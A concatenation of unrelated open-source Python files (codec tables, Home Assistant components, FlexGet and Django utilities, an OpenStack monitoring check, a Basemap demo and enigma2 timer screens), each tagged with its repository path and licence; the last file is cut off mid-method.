0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x03b1, # GREEK SMALL LETTER ALPHA
0x00e1: 0x00df, # LATIN SMALL LETTER SHARP S
0x00e2: 0x0393, # GREEK CAPITAL LETTER GAMMA
0x00e3: 0x03c0, # GREEK SMALL LETTER PI
0x00e4: 0x03a3, # GREEK CAPITAL LETTER SIGMA
0x00e5: 0x03c3, # GREEK SMALL LETTER SIGMA
0x00e6: 0x00b5, # MICRO SIGN
0x00e7: 0x03c4, # GREEK SMALL LETTER TAU
0x00e8: 0x03a6, # GREEK CAPITAL LETTER PHI
0x00e9: 0x0398, # GREEK CAPITAL LETTER THETA
0x00ea: 0x03a9, # GREEK CAPITAL LETTER OMEGA
0x00eb: 0x03b4, # GREEK SMALL LETTER DELTA
0x00ec: 0x221e, # INFINITY
0x00ed: 0x03c6, # GREEK SMALL LETTER PHI
0x00ee: 0x03b5, # GREEK SMALL LETTER EPSILON
0x00ef: 0x2229, # INTERSECTION
0x00f0: 0x2261, # IDENTICAL TO
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x2265, # GREATER-THAN OR EQUAL TO
0x00f3: 0x2264, # LESS-THAN OR EQUAL TO
0x00f4: 0x2320, # TOP HALF INTEGRAL
0x00f5: 0x2321, # BOTTOM HALF INTEGRAL
0x00f6: 0x00f7, # DIVISION SIGN
0x00f7: 0x2248, # ALMOST EQUAL TO
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x221a, # SQUARE ROOT
0x00fc: 0x207f, # SUPERSCRIPT LATIN SMALL LETTER N
0x00fd: 0x00b2, # SUPERSCRIPT TWO
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Encoding Map
encoding_map = {}
for k,v in decoding_map.items():
encoding_map[v] = k
| MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-2.1/Lib/encodings/cp861.py | Python | mit | 7,192 |
"""
Support for Unifi WAP controllers.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/device_tracker.unifi/
"""
import logging
import urllib
from homeassistant.components.device_tracker import DOMAIN
from homeassistant.const import CONF_HOST, CONF_USERNAME, CONF_PASSWORD
from homeassistant.helpers import validate_config
# Unifi package doesn't list urllib3 as a requirement
REQUIREMENTS = ['urllib3', 'unifi==1.2.5']
_LOGGER = logging.getLogger(__name__)
CONF_PORT = 'port'
CONF_SITE_ID = 'site_id'
def get_scanner(hass, config):
"""Setup Unifi device_tracker."""
from unifi.controller import Controller
if not validate_config(config, {DOMAIN: [CONF_USERNAME,
CONF_PASSWORD]},
_LOGGER):
_LOGGER.error('Invalid configuration')
return False
this_config = config[DOMAIN]
host = this_config.get(CONF_HOST, 'localhost')
username = this_config.get(CONF_USERNAME)
password = this_config.get(CONF_PASSWORD)
site_id = this_config.get(CONF_SITE_ID, 'default')
try:
port = int(this_config.get(CONF_PORT, 8443))
except ValueError:
_LOGGER.error('Invalid port (must be numeric like 8443)')
return False
try:
ctrl = Controller(host, username, password, port, 'v4', site_id)
except urllib.error.HTTPError as ex:
_LOGGER.error('Failed to connect to unifi: %s', ex)
return False
return UnifiScanner(ctrl)
class UnifiScanner(object):
"""Provide device_tracker support from Unifi WAP client data."""
def __init__(self, controller):
"""Initialize the scanner."""
self._controller = controller
self._update()
def _update(self):
"""Get the clients from the device."""
try:
clients = self._controller.get_clients()
except urllib.error.HTTPError as ex:
_LOGGER.error('Failed to scan clients: %s', ex)
clients = []
self._clients = {client['mac']: client for client in clients}
def scan_devices(self):
"""Scan for devices."""
self._update()
return self._clients.keys()
def get_device_name(self, mac):
"""Return the name (if known) of the device.
If a name has been set in Unifi, then return that, else
return the hostname if it has been detected.
"""
client = self._clients.get(mac, {})
name = client.get('name') or client.get('hostname')
_LOGGER.debug('Device %s name %s', mac, name)
return name
| deisi/home-assistant | homeassistant/components/device_tracker/unifi.py | Python | mit | 2,645 |
#!/usr/bin/env python
from setuptools import find_packages, setup
from eventlet import __version__
from os import path
setup(
name='eventlet',
version=__version__,
description='Highly concurrent networking library',
author='Linden Lab',
author_email='eventletdev@lists.secondlife.com',
url='http://eventlet.net',
packages=find_packages(exclude=['benchmarks', 'tests', 'tests.*']),
install_requires=(
'greenlet >= 0.3',
),
zip_safe=False,
long_description=open(
path.join(
path.dirname(__file__),
'README.rst'
)
).read(),
test_suite='nose.collector',
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX",
"Operating System :: Microsoft :: Windows",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Topic :: Internet",
"Topic :: Software Development :: Libraries :: Python Modules",
"Intended Audience :: Developers",
"Development Status :: 4 - Beta",
]
)
| collinstocks/eventlet | setup.py | Python | mit | 1,289 |
# Hack, hide DataLossWarnings
# Based on html5lib code namespaceHTMLElements=False should do it, but nope ...
# Also it doesn't seem to be available in older version from html5lib, removing it
import warnings
from typing import IO, Union
from bs4 import BeautifulSoup
from html5lib.constants import DataLossWarning
warnings.simplefilter('ignore', DataLossWarning)
def get_soup(obj: Union[str, IO, bytes], parser: str = 'html5lib') -> BeautifulSoup:
return BeautifulSoup(obj, parser)
| Flexget/Flexget | flexget/utils/soup.py | Python | mit | 491 |
from __future__ import unicode_literals, division, absolute_import
import re
from argparse import ArgumentParser, ArgumentTypeError
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from flexget import options
from flexget.event import event
from flexget.terminal import TerminalTable, TerminalTableError, table_parser, console
from flexget.utils.database import Session
from . import db
def do_cli(manager, options):
"""Handle regexp-list cli"""
action_map = {
'all': action_all,
'list': action_list,
'add': action_add,
'del': action_del,
'purge': action_purge,
}
action_map[options.regexp_action](options)
def action_all(options):
""" Show all regexp lists """
lists = db.get_regexp_lists()
header = ['#', 'List Name']
table_data = [header]
for regexp_list in lists:
table_data.append([regexp_list.id, regexp_list.name])
table = TerminalTable(options.table_type, table_data)
try:
console(table.output)
except TerminalTableError as e:
console('ERROR: %s' % str(e))
def action_list(options):
"""List regexp list"""
with Session() as session:
regexp_list = db.get_list_by_exact_name(options.list_name)
if not regexp_list:
console('Could not find regexp list with name {}'.format(options.list_name))
return
header = ['Regexp']
table_data = [header]
regexps = db.get_regexps_by_list_id(
regexp_list.id, order_by='added', descending=True, session=session
)
for regexp in regexps:
regexp_row = [regexp.regexp or '']
table_data.append(regexp_row)
try:
table = TerminalTable(options.table_type, table_data)
console(table.output)
except TerminalTableError as e:
console('ERROR: %s' % str(e))
def action_add(options):
with Session() as session:
regexp_list = db.get_list_by_exact_name(options.list_name)
if not regexp_list:
console('Could not find regexp list with name {}, creating'.format(options.list_name))
regexp_list = db.create_list(options.list_name, session=session)
regexp = db.get_regexp(list_id=regexp_list.id, regexp=options.regexp, session=session)
if not regexp:
console("Adding regexp {} to list {}".format(options.regexp, regexp_list.name))
db.add_to_list_by_name(regexp_list.name, options.regexp, session=session)
console(
'Successfully added regexp {} to regexp list {} '.format(
options.regexp, regexp_list.name
)
)
else:
console("Regexp {} already exists in list {}".format(options.regexp, regexp_list.name))
def action_del(options):
with Session() as session:
regexp_list = db.get_list_by_exact_name(options.list_name)
if not regexp_list:
console('Could not find regexp list with name {}'.format(options.list_name))
return
regexp = db.get_regexp(list_id=regexp_list.id, regexp=options.regexp, session=session)
if regexp:
console('Removing regexp {} from list {}'.format(options.regexp, options.list_name))
session.delete(regexp)
else:
console(
'Could not find regexp {} in list {}'.format(
options.movie_title, options.list_name
)
)
return
def action_purge(options):
with Session() as session:
regexp_list = db.get_list_by_exact_name(options.list_name)
if not regexp_list:
console('Could not find regexp list with name {}'.format(options.list_name))
return
console('Deleting list %s' % options.list_name)
session.delete(regexp_list)
def regexp_type(regexp):
try:
re.compile(regexp)
return regexp
except re.error as e:
raise ArgumentTypeError(e)
@event('options.register')
def register_parser_arguments():
# Common option to be used in multiple subparsers
regexp_parser = ArgumentParser(add_help=False)
regexp_parser.add_argument('regexp', type=regexp_type, help="The regexp")
list_name_parser = ArgumentParser(add_help=False)
list_name_parser.add_argument(
'list_name', nargs='?', help='Name of regexp list to operate on', default='regexps'
)
# Register subcommand
parser = options.register_command('regexp-list', do_cli, help='View and manage regexp lists')
# Set up our subparsers
subparsers = parser.add_subparsers(title='actions', metavar='<action>', dest='regexp_action')
subparsers.add_parser('all', parents=[table_parser], help='Shows all existing regexp lists')
subparsers.add_parser(
'list', parents=[list_name_parser, table_parser], help='List regexp from a list'
)
subparsers.add_parser(
'add', parents=[list_name_parser, regexp_parser], help='Add a regexp to a list'
)
subparsers.add_parser(
'del', parents=[list_name_parser, regexp_parser], help='Remove a regexp from a list'
)
subparsers.add_parser(
'purge', parents=[list_name_parser], help='Removes an entire list. Use with caution!'
)
| gazpachoking/Flexget | flexget/components/managed_lists/lists/regexp_list/cli.py | Python | mit | 5,302 |
# -*- coding: utf-8 -*-
# adaped from https://www.djangosnippets.org/snippets/1376/
from os.path import abspath, dirname, isdir, join
from django.apps import apps
from django.core.exceptions import ImproperlyConfigured
from django.template import TemplateDoesNotExist
from django.template.loaders.filesystem import Loader
class NameSpacedLoader(Loader):
def _get_template_vars(self, template_name):
app_name, template_name = template_name.split(":", 1)
try:
template_dir = abspath(join(apps.get_app_config(app_name).path, 'templates'))
except ImproperlyConfigured:
raise TemplateDoesNotExist()
return template_name, template_dir
def load_template_from_app(self, template_name, template_dirs=None):
"""
Template loader that only serves templates from specific app's template directory.
Works for template_names in format app_label:some/template/name.html
"""
if ":" not in template_name:
raise TemplateDoesNotExist()
template_name, template_dir = self._get_template_vars(template_name)
if not isdir(template_dir):
raise TemplateDoesNotExist()
return super().load_template_source(template_name, template_dirs=[template_dir])
def load_template_source(self, template_name, template_dirs=None):
return self.load_template_from_app(template_name)
| rambo/asylum | project/asylum/apptemplateloader.py | Python | mit | 1,416 |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Openstack Monitoring script for Sensu / Nagios
#
# Copyright © 2013-2014 eNovance <licensing@enovance.com>
#
# Author: Mehdi Abaakouk <mehdi.abaakouk@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oschecks import utils
def _check_ceilometer_api():
ceilometer = utils.Ceilometer()
ceilometer.add_argument('-w', dest='warning', type=int, default=5,
help='Warning timeout for Ceilometer APIs calls')
ceilometer.add_argument('-c', dest='critical', type=int, default=10,
help='Critical timeout for Ceilometer APIs calls')
options, client = ceilometer.setup()
elapsed, meters = utils.timeit(client.meters.list)
if not meters:
utils.critical("Unable to contact Ceilometer API.")
if elapsed > options.critical:
utils.critical("Get meters took more than %d seconds, "
"it's too long.|response_time=%d" %
(options.critical, elapsed))
elif elapsed > options.warning:
utils.warning("Get meters took more than %d seconds, "
"it's too long.|response_time=%d" %
(options.warning, elapsed))
else:
utils.ok("Get meters, Ceilometer API is working: "
"list %d meters in %d seconds.|response_time=%d" %
(len(meters), elapsed, elapsed))
def check_ceilometer_api():
utils.safe_run(_check_ceilometer_api)
| juliovp01/ops_tools | roles/monitoring/files/ceilometer.py | Python | mit | 2,011 |
"""
Support for showing the date and the time.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.time_date/
"""
import logging
import homeassistant.util.dt as dt_util
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
OPTION_TYPES = {
'time': 'Time',
'date': 'Date',
'date_time': 'Date & Time',
'time_date': 'Time & Date',
'beat': 'Time (beat)',
'time_utc': 'Time (UTC)',
}
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the Time and Date sensor."""
if hass.config.time_zone is None:
_LOGGER.error("Timezone is not set in Home Assistant config")
return False
dev = []
for variable in config['display_options']:
if variable not in OPTION_TYPES:
_LOGGER.error('Option type: "%s" does not exist', variable)
else:
dev.append(TimeDateSensor(variable))
add_devices(dev)
# pylint: disable=too-few-public-methods
class TimeDateSensor(Entity):
"""Implementation of a Time and Date sensor."""
def __init__(self, option_type):
"""Initialize the sensor."""
self._name = OPTION_TYPES[option_type]
self.type = option_type
self._state = None
self.update()
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def icon(self):
"""Icon to use in the frontend, if any."""
if "date" in self.type and "time" in self.type:
return "mdi:calendar-clock"
elif "date" in self.type:
return "mdi:calendar"
else:
return "mdi:clock"
def update(self):
"""Get the latest data and updates the states."""
time_date = dt_util.utcnow()
time = dt_util.datetime_to_time_str(dt_util.as_local(time_date))
time_utc = dt_util.datetime_to_time_str(time_date)
date = dt_util.datetime_to_date_str(dt_util.as_local(time_date))
# Calculate the beat (Swatch Internet Time) time without date.
hours, minutes, seconds = time_date.strftime('%H:%M:%S').split(':')
beat = ((int(seconds) + (int(minutes) * 60) + ((int(hours) + 1) *
3600)) / 86.4)
if self.type == 'time':
self._state = time
elif self.type == 'date':
self._state = date
elif self.type == 'date_time':
self._state = date + ', ' + time
elif self.type == 'time_date':
self._state = time + ', ' + date
elif self.type == 'time_utc':
self._state = time_utc
elif self.type == 'beat':
self._state = '{0:.2f}'.format(beat)
| justyns/home-assistant | homeassistant/components/sensor/time_date.py | Python | mit | 2,911 |
from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
# read in data.
file = open('fcover.dat','r')
ul=[];vl=[];pl=[]
nlons=73; nlats=73
dellat = 2.5; dellon = 5.
for line in file.readlines():
l = line.replace('\n','').split()
ul.append(float(l[0]))
vl.append(float(l[1]))
pl.append(float(l[2]))
u = np.reshape(np.array(ul,np.float32),(nlats,nlons))
v = np.reshape(np.array(vl,np.float32),(nlats,nlons))
p = np.reshape(np.array(pl,np.float32),(nlats,nlons))
lats1 = -90.+dellat*np.arange(nlats)
lons1 = -180.+dellon*np.arange(nlons)
lons, lats = np.meshgrid(lons1, lats1)
# convert from mps to knots.
u = 1.944*u; v = 1.944*v
# plot barbs in map projection coordinates.
# stereogrpaphic projection.
m = Basemap(width=10000000,height=10000000,lon_0=-90,lat_0=45.,lat_ts=45,
resolution='l',projection='stere')
x,y = m(lons,lats)
# transform from spherical to map projection coordinates (rotation
# and interpolation).
nxv = 25; nyv = 25
udat, vdat, xv, yv = m.transform_vector(u,v,lons1,lats1,nxv,nyv,returnxy=True)
# create a figure, add an axes.
fig=plt.figure(figsize=(8,6))
ax = fig.add_axes([0.1,0.1,0.8,0.8])
# plot color-filled contours over map
levs = np.arange(960,1051,4)
cs1 = m.contour(x,y,p,levs,colors='k',linewidths=0.5)
cs2 = m.contourf(x,y,p,levs)
# plot barbs.
m.barbs(xv,yv,udat,vdat,length=6,barbcolor='k',flagcolor='r',linewidth=0.5)
# plot colorbar for pressure
m.colorbar(pad='12%') # draw colorbar
# draw coastlines
m.drawcoastlines()
# draw parallels
m.drawparallels(np.arange(0,81,20),labels=[1,1,0,0])
# draw meridians
m.drawmeridians(np.arange(-180,0,20),labels=[0,0,0,1])
plt.title('Surface Wind Barbs and Pressure (NH)')
# stereogrpaphic projection (SH).
# 'flip_barb' flag is automatically set for SH data, so that
# barbs point toward lower pressure (in both Hemisphere).
m = Basemap(width=10000000,height=10000000,lon_0=-90,lat_0=-45.,lat_ts=-45,
resolution='l',projection='stere')
x,y = m(lons,lats)
# transform from spherical to map projection coordinates (rotation
# and interpolation).
nxv = 25; nyv = 25
udat, vdat, xv, yv = m.transform_vector(u,v,lons1,lats1,nxv,nyv,returnxy=True)
# create a figure, add an axes.
fig=plt.figure(figsize=(8,6))
ax = fig.add_axes([0.1,0.1,0.8,0.8])
# plot color-filled contours over map
levs = np.arange(960,1051,4)
cs1 = m.contour(x,y,p,levs,colors='k',linewidths=0.5)
cs2 = m.contourf(x,y,p,levs)
# plot barbs.
m.barbs(xv,yv,udat,vdat,length=6,barbcolor='k',flagcolor='r',linewidth=0.5)
# plot colorbar for pressure
m.colorbar(pad='12%') # draw colorbar
# draw coastlines
m.drawcoastlines()
# draw parallels
m.drawparallels(np.arange(-80,-19,20),labels=[1,1,0,0])
# draw meridians
m.drawmeridians(np.arange(-180,0,20),labels=[0,0,1,0])
plt.title('Surface Wind Barbs and Pressure (SH)',y=1.04)
plt.show()
| raincoatrun/basemap | examples/barb_demo.py | Python | gpl-2.0 | 2,853 |
from Screen import Screen
from Components.Label import Label
class PVRState(Screen):
def __init__(self, session):
Screen.__init__(self, session)
self["state"] = Label(text="")
class TimeshiftState(PVRState):
pass
| blzr/enigma2 | lib/python/Screens/PVRState.py | Python | gpl-2.0 | 224 |
# -*- coding: utf-8 -*-
from time import localtime, mktime, time, strftime
from datetime import datetime
from enigma import eEPGCache
from Screens.Screen import Screen
import ChannelSelection
from ServiceReference import ServiceReference
from Components.config import config, ConfigSelection, ConfigText, ConfigSubList, ConfigDateTime, ConfigClock, ConfigYesNo, getConfigListEntry
from Components.ActionMap import NumberActionMap, ActionMap
from Components.ConfigList import ConfigListScreen
from Components.MenuList import MenuList
from Components.Button import Button
from Components.Label import Label
from Components.Pixmap import Pixmap
from Components.SystemInfo import SystemInfo
from Components.UsageConfig import defaultMoviePath
from Components.Sources.Boolean import Boolean
from Screens.MovieSelection import getPreferredTagEditor
from Screens.LocationBox import MovieLocationBox
from Screens.ChoiceBox import ChoiceBox
from Screens.MessageBox import MessageBox
from Screens.VirtualKeyBoard import VirtualKeyBoard
from Screens.Setup import SetupSummary
from RecordTimer import AFTEREVENT
class TimerEntry(Screen, ConfigListScreen):
def __init__(self, session, timer):
Screen.__init__(self, session)
self.setup_title = _("Timer entry")
self.timer = timer
self.entryDate = None
self.entryService = None
self["HelpWindow"] = Pixmap()
self["HelpWindow"].hide()
self["VKeyIcon"] = Boolean(False)
self["description"] = Label("")
self["oktext"] = Label(_("OK"))
self["canceltext"] = Label(_("Cancel"))
self["ok"] = Pixmap()
self["cancel"] = Pixmap()
self.createConfig()
self["actions"] = NumberActionMap(["SetupActions", "GlobalActions", "PiPSetupActions", "ColorActions"],
{
"ok": self.keySelect,
"save": self.keyGo,
"cancel": self.keyCancel,
"volumeUp": self.incrementStart,
"volumeDown": self.decrementStart,
"size+": self.incrementEnd,
"size-": self.decrementEnd,
}, -2)
self["VirtualKB"] = ActionMap(["VirtualKeyboardActions"],
{
"showVirtualKeyboard": self.KeyText,
}, -2)
self["VirtualKB"].setEnabled(False)
self.onChangedEntry = [ ]
self.list = []
ConfigListScreen.__init__(self, self.list, session = session)
self.createSetup("config")
self.onLayoutFinish.append(self.layoutFinished)
if not self.selectionChanged in self["config"].onSelectionChanged:
self["config"].onSelectionChanged.append(self.selectionChanged)
self.selectionChanged()
def createConfig(self):
justplay = self.timer.justplay
always_zap = self.timer.always_zap
rename_repeat = self.timer.rename_repeat
afterevent = {
AFTEREVENT.NONE: "nothing",
AFTEREVENT.DEEPSTANDBY: "deepstandby",
AFTEREVENT.STANDBY: "standby",
AFTEREVENT.AUTO: "auto"
}[self.timer.afterEvent]
if self.timer.record_ecm and self.timer.descramble:
recordingtype = "descrambled+ecm"
elif self.timer.record_ecm:
recordingtype = "scrambled+ecm"
elif self.timer.descramble:
recordingtype = "normal"
weekday_table = ("mon", "tue", "wed", "thu", "fri", "sat", "sun")
# calculate default values
day = []
weekday = 0
for x in (0, 1, 2, 3, 4, 5, 6):
day.append(0)
if self.timer.repeated: # repeated
type = "repeated"
if self.timer.repeated == 31: # Mon-Fri
repeated = "weekdays"
elif self.timer.repeated == 127: # daily
repeated = "daily"
else:
flags = self.timer.repeated
repeated = "user"
count = 0
for x in (0, 1, 2, 3, 4, 5, 6):
if flags == 1: # weekly
# print "Set to weekday " + str(x)
weekday = x
if flags & 1 == 1: # set user defined flags
day[x] = 1
count += 1
else:
day[x] = 0
flags >>= 1
if count == 1:
repeated = "weekly"
else: # once
type = "once"
repeated = None
weekday = int(strftime("%u", localtime(self.timer.begin))) - 1
day[weekday] = 1
self.timerentry_justplay = ConfigSelection(choices = [
("zap", _("zap")), ("record", _("record")), ("zap+record", _("zap and record"))],
default = {0: "record", 1: "zap", 2: "zap+record"}[justplay + 2*always_zap])
if SystemInfo["DeepstandbySupport"]:
shutdownString = _("go to deep standby")
else:
shutdownString = _("shut down")
self.timerentry_afterevent = ConfigSelection(choices = [("nothing", _("do nothing")), ("standby", _("go to standby")), ("deepstandby", shutdownString), ("auto", _("auto"))], default = afterevent)
self.timerentry_recordingtype = ConfigSelection(choices = [("normal", _("normal")), ("descrambled+ecm", _("descramble and record ecm")), ("scrambled+ecm", _("don't descramble, record ecm"))], default = recordingtype)
self.timerentry_type = ConfigSelection(choices = [("once",_("once")), ("repeated", _("repeated"))], default = type)
self.timerentry_name = ConfigText(default = self.timer.name.replace('\xc2\x86', '').replace('\xc2\x87', '').encode("utf-8"), visible_width = 50, fixed_size = False)
self.timerentry_description = ConfigText(default = self.timer.description, visible_width = 50, fixed_size = False)
self.timerentry_tags = self.timer.tags[:]
# if no tags found, make name of event default tag set.
if not self.timerentry_tags:
tagname = self.timer.name.strip()
if tagname:
tagname = tagname[0].upper() + tagname[1:].replace(" ", "_")
self.timerentry_tags.append(tagname)
self.timerentry_tagsset = ConfigSelection(choices = [not self.timerentry_tags and "None" or " ".join(self.timerentry_tags)])
self.timerentry_repeated = ConfigSelection(default = repeated, choices = [("weekly", _("weekly")), ("daily", _("daily")), ("weekdays", _("Mon-Fri")), ("user", _("user defined"))])
self.timerentry_renamerepeat = ConfigYesNo(default = rename_repeat)
self.timerentry_date = ConfigDateTime(default = self.timer.begin, formatstring = _("%d %B %Y"), increment = 86400)
self.timerentry_starttime = ConfigClock(default = self.timer.begin)
self.timerentry_endtime = ConfigClock(default = self.timer.end)
self.timerentry_showendtime = ConfigSelection(default = False, choices = [(True, _("yes")), (False, _("no"))])
default = self.timer.dirname or defaultMoviePath()
tmp = config.movielist.videodirs.value
if default not in tmp:
tmp.append(default)
self.timerentry_dirname = ConfigSelection(default = default, choices = tmp)
self.timerentry_repeatedbegindate = ConfigDateTime(default = self.timer.repeatedbegindate, formatstring = _("%d.%B %Y"), increment = 86400)
self.timerentry_weekday = ConfigSelection(default = weekday_table[weekday], choices = [("mon",_("Monday")), ("tue", _("Tuesday")), ("wed",_("Wednesday")), ("thu", _("Thursday")), ("fri", _("Friday")), ("sat", _("Saturday")), ("sun", _("Sunday"))])
self.timerentry_day = ConfigSubList()
for x in (0, 1, 2, 3, 4, 5, 6):
self.timerentry_day.append(ConfigYesNo(default = day[x]))
# FIXME some service-chooser needed here
servicename = "N/A"
try: # no current service available?
servicename = str(self.timer.service_ref.getServiceName())
except:
pass
self.timerentry_service_ref = self.timer.service_ref
self.timerentry_service = ConfigSelection([servicename])
def createSetup(self, widget):
self.list = []
self.entryName = getConfigListEntry(_("Name"), self.timerentry_name, _("Set the name the recording will get."))
self.list.append(self.entryName)
self.entryDescription = getConfigListEntry(_("Description"), self.timerentry_description, _("Set the description of the recording."))
self.list.append(self.entryDescription)
self.timerJustplayEntry = getConfigListEntry(_("Timer type"), self.timerentry_justplay, _("Chose between record and ZAP."))
self.list.append(self.timerJustplayEntry)
self.timerTypeEntry = getConfigListEntry(_("Repeat type"), self.timerentry_type, _("A repeating timer or just once?"))
self.list.append(self.timerTypeEntry)
if self.timerentry_type.value == "once":
self.frequencyEntry = None
else: # repeated
self.frequencyEntry = getConfigListEntry(_("Repeats"), self.timerentry_repeated, _("Choose between Daily, Weekly, Weekdays or user defined."))
self.list.append(self.frequencyEntry)
self.repeatedbegindateEntry = getConfigListEntry(_("Starting on"), self.timerentry_repeatedbegindate, _("Set the date the timer must start."))
self.list.append(self.repeatedbegindateEntry)
if self.timerentry_repeated.value == "daily":
pass
if self.timerentry_repeated.value == "weekdays":
pass
if self.timerentry_repeated.value == "weekly":
self.list.append(getConfigListEntry(_("Weekday"), self.timerentry_weekday))
if self.timerentry_repeated.value == "user":
self.list.append(getConfigListEntry(_("Monday"), self.timerentry_day[0]))
self.list.append(getConfigListEntry(_("Tuesday"), self.timerentry_day[1]))
self.list.append(getConfigListEntry(_("Wednesday"), self.timerentry_day[2]))
self.list.append(getConfigListEntry(_("Thursday"), self.timerentry_day[3]))
self.list.append(getConfigListEntry(_("Friday"), self.timerentry_day[4]))
self.list.append(getConfigListEntry(_("Saturday"), self.timerentry_day[5]))
self.list.append(getConfigListEntry(_("Sunday"), self.timerentry_day[6]))
if self.timerentry_justplay.value != "zap":
self.list.append(getConfigListEntry(_("Rename name and description for new events"), self.timerentry_renamerepeat))
self.entryDate = getConfigListEntry(_("Date"), self.timerentry_date, _("Set the date the timer must start."))
if self.timerentry_type.value == "once":
self.list.append(self.entryDate)
self.entryStartTime = getConfigListEntry(_("Start time"), self.timerentry_starttime, _("Set the time the timer must start."))
self.list.append(self.entryStartTime)
self.entryShowEndTime = getConfigListEntry(_("Set end time"), self.timerentry_showendtime, _("Set the time the timer must stop."))
# if self.timerentry_justplay.value == "zap":
# self.list.append(self.entryShowEndTime)
self.entryEndTime = getConfigListEntry(_("End time"), self.timerentry_endtime, _("Set the time the timer must stop."))
if self.timerentry_justplay.value != "zap" or self.timerentry_showendtime.value:
self.list.append(self.entryEndTime)
self.channelEntry = getConfigListEntry(_("Channel"), self.timerentry_service, _("Set the channel for this timer."))
self.list.append(self.channelEntry)
self.dirname = getConfigListEntry(_("Location"), self.timerentry_dirname, _("Where should the recording be saved?"))
self.tagsSet = getConfigListEntry(_("Tags"), self.timerentry_tagsset, _("Choose a tag for easy finding a recording."))
if self.timerentry_justplay.value != "zap":
if config.usage.setup_level.index >= 2: # expert+
self.list.append(self.dirname)
if getPreferredTagEditor():
self.list.append(self.tagsSet)
self.list.append(getConfigListEntry(_("After event"), self.timerentry_afterevent, _("What action is required on complettion of the timer? 'Auto' lets the box return to the state it had when the timer started. 'Do nothing', 'Go to standby' and 'Go to deep standby' do ecaxtly that.")))
self.list.append(getConfigListEntry(_("Recording type"), self.timerentry_recordingtype, _("Descramble & record ECM' gives the option to descramble afterwards if descrambling on recording failed. 'Don't descramble, record ECM' save a scramble recording that can be descrambled on playback. 'Normal' means descramble the recording and don't record ECM.")))
self[widget].list = self.list
self[widget].l.setList(self.list)
def selectionChanged(self):
if self["config"].getCurrent():
if len(self["config"].getCurrent()) > 2 and self["config"].getCurrent()[2]:
self["description"].setText(self["config"].getCurrent()[2])
if isinstance(self["config"].getCurrent()[1], ConfigText):
if self.has_key("VKeyIcon"):
self["VirtualKB"].setEnabled(True)
self["VKeyIcon"].boolean = True
if self.has_key("HelpWindow"):
if self["config"].getCurrent()[1].help_window and self["config"].getCurrent()[1].help_window.instance is not None:
helpwindowpos = self["HelpWindow"].getPosition()
from enigma import ePoint
self["config"].getCurrent()[1].help_window.instance.move(ePoint(helpwindowpos[0],helpwindowpos[1]))
else:
if self.has_key("VKeyIcon"):
self["VirtualKB"].setEnabled(False)
self["VKeyIcon"].boolean = False
else:
if self.has_key("VKeyIcon"):
self["VirtualKB"].setEnabled(False)
self["VKeyIcon"].boolean = False
def layoutFinished(self):
self.setTitle(_(self.setup_title))
def createSummary(self):
return SetupSummary
# for summary:
def changedEntry(self):
for x in self.onChangedEntry:
x()
def getCurrentEntry(self):
return self["config"].getCurrent() and self["config"].getCurrent()[0] or ""
def getCurrentValue(self):
